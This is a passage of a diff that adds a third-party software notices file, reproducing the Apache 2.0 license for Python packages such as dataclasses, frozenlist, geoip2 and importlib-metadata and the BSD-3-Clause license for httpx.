+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+dataclasses 0.8 - Apache-2.0
+
+
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+frozenlist 1.2.0 - Apache-2.0
+
+
+copyright 2013-2019
+Copyright 2013-2019 Nikolay Kim and Andrew Svetlov
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+geoip2 4.5.0 - Apache-2.0
+
+
+(c) JS Foundation and other contributors
+Copyright JS Foundation and other contributors
+(c) 2009-2012 Jeremy Ashkenas, DocumentCloud Inc.
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+httpx 0.21 - BSD-3-Clause "New" or "Revised" License
+
+
+Copyright © 2019, [Encode OSS Ltd](https://www.encode.io/).
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+* Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+importlib-metadata 4.10.0 - Apache-2.0
+
+
+Copyright 2017-2019 Jason R. Coombs, Barry Warsaw
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
